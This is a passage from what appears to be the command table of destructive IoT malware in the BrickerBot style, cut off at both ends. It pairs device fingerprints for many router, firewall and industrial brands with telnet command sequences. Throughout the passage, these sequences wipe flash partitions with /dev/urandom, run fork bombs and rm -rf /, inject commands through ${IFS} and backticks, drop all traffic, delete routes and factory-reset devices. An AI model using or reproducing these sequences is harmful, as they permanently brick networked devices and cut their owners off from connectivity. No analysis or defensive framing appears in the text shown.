if=/dev/urandom of=/dev/mtdblock3 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtd0 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtd1 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtd2 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtd3 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/root &' , '%WAIT%' , 'ifconfig br0 down &' , '[>#] ' , 'ifconfig ppp0 down &' , '[>#] ' , 'ifconfig eth1 down &' , '[>#] ' , 'ifconfig eth2 down &' , '[>#] ' , 'ifconfig eth3 down &' , '[>#] ' , 'ifconfig eth4 down &' , '[>#] ' , 'ifconfig eth5 down &' , '[>#] ' , 'ifconfig eth6 down &' , '[>#] ' , 'ifconfig eth7 down &' , '[>#] ' , 'ifconfig eth8 down &' , '[>#] ' , 'ifconfig ixp0 down &' , '[>#] ' , 'ifconfig ixp1 down &' , '[>#] ' , 'ifconfig ipsec0 down &' , '[>#] ' , 'route del default' , '%WAIT%' , 'restore_factory_settings' , '[>#] ' , 'restore_default' , '[>#] ' , 'exit' , '[>#] ' , 'restore_factory_settings' , '[>#] ' , 'restore_default' , '[>#] ' , ] , [ 'vpnaccess' , '.*' , '(Welcome to VPN Access|voipGwH245Tunneling.*rw)' , '46' , '[>#] ' , 'Dest:00=1.2.3.4' , '[>#] ' , 'Dest:01=1.2.3.4' , '[>#] ' , 'Dest:02=1.2.3.4' , '[>#] ' , 'Dest:03=1.2.3.4' , '[>#] ' , ] , [ 'draytek' , '.*' , '(Dray[tT]ek>|Draytek login)' , 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/root${IFS}&' , '[>#] ' , 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock0${IFS}&' , '[>#] ' , 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock1${IFS}&' , '[>#] ' , 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock2${IFS}&' , '[>#] ' , 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock3${IFS}&' , '[>#] ' , 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock4${IFS}&' , '[>#] ' , 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock5${IFS}&' , '[>#] ' , 'traceroute ;iptables${IFS}-A${IFS}OUTPUT${IFS}DROP' , '[>#] ' , 'traceroute ;route${IFS}del${IFS}default' , '[>#] ' , ] , [ 'ktcatv' , '.*' , '\@ktcatv:' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#\$] ' , 'route del default' , '[>#\$] ' , 'iptables -A OUTPUT DROP' , '%WAIT%' , 'd() { d|d & }; d 2>/dev/null' , '[>#\$] ' , 'd() { d|d & }; d 2>/dev/null' , '[>#\$] ' , ] , [ 'digi' , '.*' , '(Digi\Ss Command Line Interface|write \Spathname\S \Sstring\S)' , 'setnetwork dhcp = off' , '[#$>] ' , 'setnetwork gateway = 1.2.3.4' , '[#$>] ' , 'setnetwork ip = 1.2.3.5' , '[#$>] ' , 'setnetwork primarydns = 127.0.0.1' , '[#$>] ' , 'setnetwork secondarydns = 127.0.0.2' , '[#$>] ' , 'reboot' , '[#$>] ' , 'wm 0 0' , '[#$>] ' , 'wm 1 0' , '[#$>] ' , 'wm 2 0' , '[#$>] ' , 'wm 3 0' , '[#$>] ' , ] , [ 'atpcli' , '.*' , '(ATP>|ATP Cli|HG\d\S+>)' , 'shell' , '[>#]' , 'welcome to shell' , '[>#]' , 'cat /dev/urandom >/mtdblock0 &' , '[>#]' , 'cat /dev/urandom >/mtdblock1 &' , '[>#]' , 'cat /dev/urandom >/mtdblock2 &' , '[>#]' , 'cat /dev/urandom >/mtdblock3 &' , '[>#]' , 'cat /dev/urandom >/mtdblock4 &' , '[>#]' , 'cat /dev/urandom >/mtdblock5 &' , '[>#]' , 'cat /dev/urandom >/mtdblock6 &' , '[>#]' , 'route del default' , '[>#]' , 'iptables -A OUTPUT -j DROP' , '[>#]' , 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock0;true' , '' , 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock3;true' , '' , 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock1;true' , '' , 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock2;true' , '' , 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock4;true' , '' , 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock5;true' , '' , 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock6;true' , '' , 'ping ?;iptables${IFS}-A${IFS}OUTPUT${IFS}-j${IFS}DROP;true' , '' , ] , [ 'netrouter' , '.*' , '(\/ETC\/PASSWD|Welcome to NetRouter|Digitel Configuration Manager|-ALF \/ETC\/)' , 'exec shell' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/root &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '[>#] ' , 'dd if=/dev/urandom of=/dev/mtdblock8 &' , '[>#] ' , 'route del default' , '[>#] ' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT%' , 'config purge all' , '[>#] ' , 'exit' , '[>#] ' , 'config purge all' , '[>#] ' , ] , [ 'junos' , '.*' , '(SRX\d+[>#]|JUNOS \d)' , 'configure' , '[>#] ' , 'set system host-name HACKED' , '[>#] ' , 'delete routing-options static route' , '[>#] ' , 'set routing-options static route 0.0.0.0/0 reject' , '[>#] ' , 'delete system name-server' , '[>#] ' , 'delete system services dhcp' , '[>#] ' , 'commit' , '[>#] ' , ] , [ 'trendchip' , '.*' , '(TrendChip Technologies|sys\s+exit\s+ether\s+wan)' , 'sys default' , '' , ] , [ 'celljanus' , '.*' , 'CellJanus RX' , '9' , 'cancel:' , 'yes' , 'continue' , ] , [ 'cisconex' , '.*' , 'Cisco Nexus Operating System' , 'virtual-service reset force' , 'y/n' , 'y' , '[>#] ' , 'format bootflash:' , 'yes/no' , 'y' , '[>#] ' , 'format usb1:' , 'yes/no' , 'y' , '[>#] ' , 'format usb2:' , 'yes/no' , 'y' , '[>#] ' , 'reload' , 'y/n' , 'y' , '' , ] , [ 'wince' , '.*' , '(Windows CE Telnet Service|Cannot execute \S+\.exe)' , 'attrib -r -h -s *.* /s' , '[>#] ' , 'attrib -r -h -s *.* /s' , '[>#] ' , 'del /s *.*' , 'Y/N' , 'y' , '[>#] ' , 'halt' , '[>#] ' , ] , [ 'ipcom' , '.*' , 'Unknown commands or command parameters are insufficient\.' , 'configure' , '[>#] ' , 'new' , '[>#] ' , 'hostname HACKED' , '[>#] ' , 'ip route default 1.2.3.4' , '[>#] ' , 'commit' , '\(y\|' , 'y' , '\(y\|' , 'y' , '[>#] ' , 'poweroff' , '\(y\|' , 'y' , '[>#] ' , 'poweroff' , '\(y\|' , 'y' , '[>#] ' , ] , [ 'meshtron' , '.*' , '(M e s h t r o n|Meshtron#|Unknown command \[uname\])' , 'factory' , '[>#] ' , ] , [ 'axelerateos' , '.*' , '(AXN AxelerateOS|CLI Error: Can\'t find command - uname)' , 'passwd' , 'Password' , '%OLDPASS%' , 'Password' , '%NEWPASS%' , 'Again' , '%NEWPASS%' , '[>#] ' , ] , [ 'aver' , 'root/svgodie' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' , 'cat /dev/urandom >/dev/sda1 &' , '[>#] ' , 'iproute del default' , '[>#] ' , 'ifdown eth0' , '[>#] ' , 'ifdown eth1' , '[>#] ' , ] , [ 'intelliserver' , '(IntelliServer Release|uname not found)' , 'reset factory' , '[>#] ' , 'save' , '[>#] ' , 'motd set line 1 HACKED*' , '[>#] ' , 'motd set line 2 HACKED*' , '[>#] ' , 'motd set line 3 HACKED*' , '[>#] ' , 'motd set line 4 HACKED' , '[>#] ' , 'password' , 'password:' , '%NEWPASS%' , 'password:' , '%NEWPASS%' , '[>#] ' , 'save' , '[>#] ' , 'shutdown now' , 'arrived' , ] , [ 'drglike' , '.*' , 'Linux version \S+openrg-rmk' , 'shell' , '[>#] ' , 'cat /dev/urandom >/dev/root &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' , 'cat /dev/urandom >/dev/mtdblock8 &' , '[>#] ' , 'route del default' , '%WAIT%' , 'restore_default' , '[>#] ' , 'exit' , '[>#] ' , 'restore_default' , '[>#] ' , ] , [ 'westermo' , '.*' , '(\s\/mrd3\d\d|MRD-310|Westermo MRD|Copyright Cybertec|esh: cat: No such command)' , 'telnet `cat /dev/urandom >/dev/mtdblock0 &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `cat /dev/urandom >/dev/mtdblock1 &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `cat /dev/urandom >/dev/mtdblock2 &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `cat /dev/urandom >/dev/mtdblock3 &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `cat /dev/urandom >/dev/mtdblock4 &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `cat /dev/urandom >/dev/mtdblock5 &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `cat /dev/urandom >/dev/mtdblock6 &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `cat /dev/urandom >/dev/mtdblock7 &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `cat /dev/urandom >/dev/root &`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `route del default`' , '[\$>#] ' , 'quit' , '[\$>#] ' , 'telnet `iptables -A OUTPUT -j DROP`' , '[\$>#] ' , 'quit' , '[\$>#] ' , ] , [ 'gapm' , '.*' , 'GAPM-\d\d\d\d' , 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock8 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock9 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mtdblock10 &' , '[>#\$] ' , 'cat /dev/urandom >/dev/mem &' , '[>#\$] ' , 'route del default' , '[>#\$] ' , ] , [ 'adc' , '.*' , 'Error: no parameter\(s\) expected' , 'oper' , '[>#\$] ' , 'passwd' , 'password:' , '%OLDPASS%' , 'password:' , '%NEWPASS%' , 'password:' , '%NEWPASS%' , '[>#\$] ' , 'exit' , '' , ] , [ 'grscli' , '.*' , 'ERR::Command \'uname\' not found!' , 'cd utils' , '[>#\$] ' , 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/root${IFS}&`' , '[>#\$] ' , 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock0${IFS}&`' , '[>#\$] ' , 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock1${IFS}&`' , '[>#\$] ' , 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock2${IFS}&`' , '[>#\$] ' , 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock3${IFS}&`' , '[>#\$] ' , 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock4${IFS}&`' , '[>#\$] ' , 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock5${IFS}&`' , '[>#\$] ' , 'tcpdump --file-name=`route${IFS}del${IFS}default`' , '[>#\$] ' , ] , [ 'fos' , '.*' , '(FOS \Snone\S.*ppc|FOS version|Welcome to FOS)' , 'umount -a' , '[>#\$] ' , 'dd if=/dev/zero of=/dev/ttfsa &' , '[>#\$] ' , 'dd if=/dev/zero of=/dev/ttfsa1 &' , '[>#\$] ' , 'dd if=/dev/zero of=/dev/root &' , '[>#\$] ' , 'dd if=/dev/zero of=/dev/ram &' , '[>#\$] ' , 'dd if=/dev/zero of=/dev/ramdisk &' , '[>#\$] ' , 'route del default' , '%WAIT%' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'davolink' , '.*' , '(invalid directory|davolink login)' , 'debug' , '[>#\$] ' , 'system' , '[>#\$] ' , 'syscmd all dd if=/dev/urandom of=/dev/mtdblock7' , '[>#\$] ' , 'syscmd all dd if=/dev/urandom of=/dev/mtdblock8' , '[>#\$] ' , 'syscmd all dd if=/dev/urandom of=/dev/mtdblock9' , '[>#\$] ' , 'syscmd all dd if=/dev/urandom of=/dev/root' , '[>#\$] ' , 'syscmd all route del default' , '[>#\$] ' , 'cd ..' , '%WAIT%' , 'cd ..' , '[>#\$] ' , 'config' , '[>#\$] ' , 'default' , 'y/n' , 'y' , '[>#\$] ' , 'cd ..' , '[>#\$] ' , 'system' , '[>#\$] ' , 'reset' , 'y/n' , 'y' , 'y/n' , 'y' , 'Done' , ] , [ 'jnior' , '.*' , '\/etc\/shadow does not exist\.' , 'hostname HACKED' , '[>#] ' , 'rd etc' , '[>#] ' , 'rd flash' , '[>#] ' , 'rd www' , '[>#] ' , 'rd tiniext' , '[>#] ' , 'rd datas' , '[>#] ' , 'cd flash2' , '[>#] ' , 'rm Config.props' , '[>#] ' , 'rm Phone.props' , '[>#] ' , 'cd ..' , '[>#] ' , 'reboot' , 'Y/N' , 'y' , 'rebooting' , ] , [ 'hpjetdirect' , '.*' , 'HP JetDirect' , 'host-name HACKED' , '[>#] ' , 'ip 127.0.0.1' , '[>#] ' , 'save' , 'saved' , ] , [ 'intelimax' , '.*' , '(INTELIMAX #|sh 1\.0)' , 'defconfig' , 'y/N' , 'y' , '' , ] , [ 'idrac' , '.*' , 'status_tag.*:.*COMMAND PROCESSING FAILED' , 'stop /system1' , 'stopped' , ] , [ 'comtrend' , '.*' , 'Comtrend Gigabit' , 'restore_defaults' , 'wait' , ] , [ 'mikrotok' , '.*' , '(\[\S+\@HACKED\] > |HAD UNSAFE PASSWORD)' , 'xxx' , '[:>] ' , 'ip firewall filter remove 9' , ' > ' , 'ip firewall filter remove 8' , ' > ' , 'ip firewall filter remove 7' , ' > ' , 'ip firewall filter remove 6' , ' > ' , 'ip firewall filter remove 5' , ' > ' , 'ip firewall filter remove 4' , ' > ' , 'ip firewall filter remove 3' , ' > ' , 'ip firewall filter remove 2' , ' > ' , 'ip firewall filter remove 1' , ' > ' , 'ip firewall filter add chain=input src-address=0.0.0.0/1 action=drop' , ' > ' , 'ip firewall filter add chain=output src-address=0.0.0.0/1 action=drop' , ' > ' , ] , [ 'mikrotik' , '.*' , '(MMM.*III.*KKK|MikroTik\sRouterOS|Doublecom\sRouterOS|bad command name )' , 'xxx' , '[:>] ' , 'xxx' , '[:>] ' , 'ip socks set enabled no' , ' > ' , 'ip proxy set enabled no' , ' > ' , 'tool sniffer stop' , ' > ' , 'system note set show-at-login yes' , ' > ' , 'system note set note \"DEVICE HACKED - ACCOUNT %OLDUSER% HAD UNSAFE PASSWORD\"' , ' > ' , 'system identity set name=HACKED' , ' > ' , 'password' , 'password' , '%OLDPASS%' , 'password' , '%NEWPASS%' , 'password' , '%NEWPASS%' , ' > ' , 'ip dns set server=8.8.8.8' , ' > ' , 'ip dns set allow-remote-requests=no' , ' > ' , 'ip dns cache flush' , ' > ' , 'system reboot' , 'reboot' , 'y' , ' > ' , 'system reset-configuration no-defaults=yes' , 'y/N' , 'y' , '' , ] , [ 'ruckus' , '.*' , '(ruckus>|The command is either unrecognized or incomplete. To view a list of commands that you ca)' , 'ping ;sh' , '[$>#] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/mtdblock8 &' , '' , 'cat /dev/urandom >/dev/mtdblock9 &' , '' , 'cat /dev/urandom >/dev/mtdblock10 &' , '' , 'cat /dev/urandom >/dev/mtdblock11 &' , '' , 'route del default' , '%WAIT%' , 'enable' , '[$>#] ' , 'set-factory' , 'Y/n' , 'y' , '[$>#] ' , 'exit' , '[$>#] ' , 'enable' , '[$>#] ' , 'set-factory' , 'Y/n' , 'y' , '[$>#] ' , ] , [ 'welotec' , '.*' , '\% command is not supported\!' , 'enable' , 'password:' , '%OLDPASS%' , '[>#] ' , 'erase startup-config' , 'filesystem' , 'y' , '[>#] ' , 'banner HACKED' , '[>#] ' , 'reboot' , 'system' , 'y' , '[>#] ' , ] , [ 'dlinkbroke' , '.*' , 'DLINK-WLAN-AP' , 'set `cat /dev/urandom >/dev/mtdblock5 &`' , '[#>] ' , 'set `cat /dev/urandom >/dev/mtdblock4 &`' , '[#>] ' , 'set `cat /dev/urandom >/dev/mtdblock3 &`' , '[#>] ' , 'set `cat /dev/urandom >/dev/mtdblock2 &`' , '[#>] ' , 'set `cat /dev/urandom >/dev/mtdblock1 &`' , '[#>] ' , 'set `cat /dev/urandom >/dev/mtdblock0 &`' , '[#>] ' , 'set `cat /dev/urandom >/dev/root &`' , '[#>] ' , 'set `route del default`' , '%WAIT%' , 'reboot' , '[#>] ' , ] , [ 'dgsdlink' , '.*' , 'DGS\-1\d+' , 'reset config' , '[>#] ' , ] , [ 'nateks' , '.*' , 'fmm.*Fault\sand\s+maintenance\smanagement' , '3' , '[>#] ' , '8' , 'configuration.*no' , 'yes' , '[>#] ' , ] , [ 'kingtype' , '.*' , '(Kingtype\sCONSOLE\sOS|Unknown command:\sls\s-alF\s\/etc\/)' , 'enable' , '[>#] ' , 'configure terminal' , '[>#] ' , 'hostname HACKED' , '[>#] ' , 'write' , 'y/n' , 'y' , '[>#] ' , 'exit' , '[>#] ' , 'tftp download config-file `poweroff` 1.2.3.4' , '[>#] ' , ] , [ 'hpipmi' , '.*' , '\/\.\/-> ' , 'cd /system1/led1' , '[>#] ' , 'set led1 enabledstate=enabled' , '[>#] ' , 'cd /system1' , '[>#] ' , 'stop /system1 -force' , '[>#] ' , 'stop /system1' , '[>#] ' , 'cd ..' , '[>#] ' , 'cd map1' , '[>#] ' , 'cd nic1' , '[>#] ' , 'set oemhp_hostname=HACKED' , '[>#] ' , 'set oemhp_nonvol_networkaddress=1.2.3.4' , '[>#] ' , 'set networkaddress=1.2.3.4' , '[>#] ' , ] , [ 'hpmp' , '.*' , '\*\*\* Invalid Selection \*\*\*' , 'cm' , '[#>] ' , 'pc -off' , 'Confirm\?' , 'y' , '[#>] ' , 'mr' , 'modem\?' , 'y' , '[#>] ' , 'dns -all default' , 'Confirm\?' , 'y' , '[#>] ' , 'lc -ip 1.2.3.4 -subnet 255.255.255.0 -gateway 1.2.3.5' , 'Confirm\?' , 'y' , '[#>] ' , ] , [ 'multiqb' , '.*' , '(MultiQb login|multiqb\.com|quiqnet\.com)' , 'enable' , '[#>] ' , 'erase' , 'Yes.*No' , 'y' , '[#>] ' , ] , [ 'hiper' , '.*' , 'Saving configuration\.\.\.' , 'clear nvram' , '[%#>] ' , 'clear running-config' , '[%#>] ' , 'clear ip dhcp server' , '[%#>] ' , 'reload' , 'y/n' , 'y' , 'Restart' , ] , [ 'maipu' , '.*' , 'Error.*Command\s\"w\"\sisn\St\ssupported!' , 'timesvc server del all' , 'y/n' , 'y' , '' , '' , '[#>] ' , 'timesvc interval set 1' , '[#>] ' , 'timesvc server add `reboot`' , '[#>] ' , 'timesvc start' , '[#>] ' , 'write' , '[#>] ' , 'reload' , 'Y/N\S:' , 'y' , 'Y/N\S:' , 'y' , 'rebooting' , ] , [ 'protei' , '.*' , 'No such command for mini_?shell' , 'restore_config && cat /dev/urandom>/dev/mtdblock3 &' , 'shell>' , 'restore_config && cat /dev/urandom>/dev/mtdblock7 &' , 'shell>' , 'restore_config && cat /dev/urandom>/dev/mtdblock0 &' , 'shell>' , 'restore_config && cat /dev/urandom>/dev/mtdblock1 &' , 'shell>' , 'restore_config && cat /dev/urandom>/dev/mtdblock2 &' , 'shell>' , 'restore_config && cat /dev/urandom>/dev/mtdblock4 &' , 'shell>' , 'restore_config && cat /dev/urandom>/dev/mtdblock5 &' , 'shell>' , 'restore_config && cat /dev/urandom>/dev/mtdblock6 &' , 'shell>' , 'restore_config && route del default' , 'shell>' , ] , [ 'netscreen' , '.*' , '---unknown keyword cat' , "set hostname HACKED\nsave" , '> ' , 'get interface' , '> ' , "set interface trust ip 1.2.3.4/24\nsave" , '> ' , "set interface ethernet0/6 ip 1.2.4.4/24\nsave" , '> ' , "set interface bgroup0 ip 1.2.5.4/24\nsave" , '> ' , "set interface ethernet0/5 ip 1.2.6.4/24\nsave" , '> ' , "set interface ethernet0/4 ip 1.2.7.4/24\nsave" , '> ' , "set interface ethernet0/3 ip 1.2.8.4/24\nsave" , '> ' , "set interface ethernet0/2 ip 1.2.9.4/24\nsave" , '> ' , "set interface ethernet0/1 ip 1.2.10.4/24\nsave" , '> ' , "set interface untrust ip 1.2.11.4/24\nsave" , '> ' , "set interface ethernet0/0 ip 1.2.12.4/24\nsave" , '> ' , "set interface ethernet1 ip 1.2.1.4/24\nsave" , '> ' , "set interface ethernet2 ip 1.2.2.4/24\nsave" , '> ' , "set interface ethernet3 ip 1.2.3.4/24\nsave" , '> ' , "set interface ethernet4 ip 1.2.4.4/24\nsave" , '> ' , "set interface ethernet5 ip 1.2.5.4/24\nsave" , '> ' , "set interface ethernet6 ip 1.2.6.4/24\nsave" , '> ' , "set interface ethernet7 ip 1.2.7.4/24\nsave" , '> ' , "set interface ethernet8 ip 1.2.8.4/24\nsave" , '> ' , "set interface tun.3 ip 1.2.15.4/24\nsave" , '> ' , "set interface tun.2 ip 1.2.16.4/24\nsave" , '> ' , "set interface tun.1 ip 1.2.17.4/24\nsave" , '> ' , "set interface adsl2/0 ip 1.2.13.4/24\nsave" , '> ' , "set interface adsl1/0 ip 1.2.14.4/24\nsave" , '> ' , ] , [ 'idirect' , '.*' , 'UCLI:\/\$' , 'demo reset' , '[#>\$] ' , 'demo start' , '[#>\$] ' , 'satellite ele_cut_off 25' , '[#>\$] ' , 'zone 1 active no' , '[#>\$] ' , 'zone 2 active no' , '[#>\$] ' , 'zone 3 active no' , '[#>\$] ' , 'zone 4 active no' , '[#>\$] ' , 'zone 5 active no' , '[#>\$] ' , 'zone 6 active no' , '[#>\$] ' , 'zone 7 active no' , '[#>\$] ' , 'zone 8 active no' , '[#>\$] ' , 'config activate' , '[#>\$] ' , 'demo reset' , '[#>\$] ' , 'demo start' , '[#>\$] ' , ] , [ 'avaya' , '.*' , 'Next possible match:' , 'enable' , '[#>] ' , 'erase legacy-configs' , '[#>] ' , 'erase scripts' , '[#>] ' , 'erase startup-config' , '[#>] ' , 'legacy-cli' , '[#>] ' , 'nvram initialize' , '[#>] ' , 'exit' , '[#>] ' , 'reset' , 'Y/N' , 'n' , 'Y/N' , 'y' , '[#>] ' , 'reset' , 'Y/N' , 'y' , '' , ] , [ 'extxos' , '.*' , 'Extreme Networks' , 'disable web https' , '[>#] ' , 'disable web http' , '[>#] ' , 'save' , 'y/N' , 'y' , '[>#] ' , 'disable ports all\nsave\ny' , '[>#] ' , 'y' , '[>#] ' , 'save' , 'y/N' , 'y' , '[>#] ' , 'disable telnet\nsave\ny' , '' , 'y' , '' , 'save' , 'y/N' , 'y' , '[>#] ' , ] , [ 'openwrt' , 'root/OPENWRTBLANK' , '' , 'df' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtdblock3 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtd3 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/root &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtdblock2 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtd2 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtdblock1 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtd1 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtdblock0 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtd0 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtdblock4 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtdblock5 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtdblock6 &' , 'root\S+# ' , 'cat /dev/urandom >/dev/mtdblock7 &' , 'root\S+# ' , 'route del default' , '%WAIT%' , 'reboot' , 'root\S+# ' , ] , [ "p661" , ".*" , 'Linux\sP-661.*' , 'flash_unlock' , '' , 'flash_unlock /dev/mtd0' , '' , 'flash_eraseall /dev/mtd0 &' , '' , 'ftl_format /dev/mtd0 &' , '' , 'ftl_format /dev/mtd1 &' , '' , 'ftl_format /dev/mtd2 &' , '' , 'ftl_format /dev/mtd3 &' , '' , 'ftl_format /dev/mtd4 &' , '' , 'rfdformat /dev/mtd0 &' , '' , 'rfdformat /dev/mtd1 &' , '' , 'rfdformat /dev/mtd2 &' , '' , 'rfdformat /dev/mtd3 &' , '' , 'rfdformat /dev/mtd4 &' , '' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' , 'd(){ d|d & };d' , '[#$>] ' , 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' , 'halt -n -f' , '[#$>] ' , 'reboot' , '[#$>] ' , ] , [ "fusion" , ".*" , 'FUSION-LTE.*admin' , 'passwd' , 'Old password: ' , '%OLDPASS%' , 'New password: ' , '%NEWPASS%' , 'Retype password: " ' , '%NEWPASS%' , '[#$>] ' , 'cat /etc/shadow' , '[#$>] ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ 'tudc' , 'admin/admin' , '(DC-5\d00|FR30\d\d|V5-5\d00|RG-ACE|NB-2\d00)' , 'net traceroute 127.0.0.1 ;sh' , 'address:' , ' ' , '[#$>] ' , ' ' , '[#$>] ' , ' ' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/root' , '[#$>] ' , ' ' , '[#$>] ' , 'ip route del default' , '[#$>] ' , ' ' , '[#$>] ' , 'd() { d|d & }; d' , '[#$>] ' , ' ' , '[#$>] ' , ] , [ "dm365" , ".*" , 'Linux dm365' , 'telnet localhost' , 'login: ' , 'root' , 'Password: ' , 'radiant' , '[#$] ' , "fdisk /dev/mtd6" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd7" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd8" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , 'rm -rf /* 2>/dev/null &' , '[#$] ' , 'route del default;iproute del default' , '[#$] ' , ] , [ "dm365" , ".*" , 'Linux ENC' , 'telnet localhost' , 'login: ' , 'root' , 'Password: ' , 'radiant' , '[#$] ' , "fdisk /dev/mtd6" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd7" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , "fdisk /dev/mtd8" , 'm\sfor\shelp\S?: ' , "w" , '[#$] ' , 'rm -rf /* 2>/dev/null &' , '[#$] ' , 'route del default;iproute del default' , '[#$] ' , ] , [ "srx" , ".*" , 'SRX\d\d\d\d.*wuname' , "\x03\x03util restore_factory_defaults" , "Y/N\S*?" , "y" , '%TERM%' , ] , [ "srxlike" , ".*" , '\S\d\d.*wuname-a' , "\x03\x03util restore_factory_defaults" , "Y/N\S*?" , "y" , '%TERM%' , ] , [ "zysh" , ".*" , 'ZySH> ' , "?" , "SH>" , ] , [ 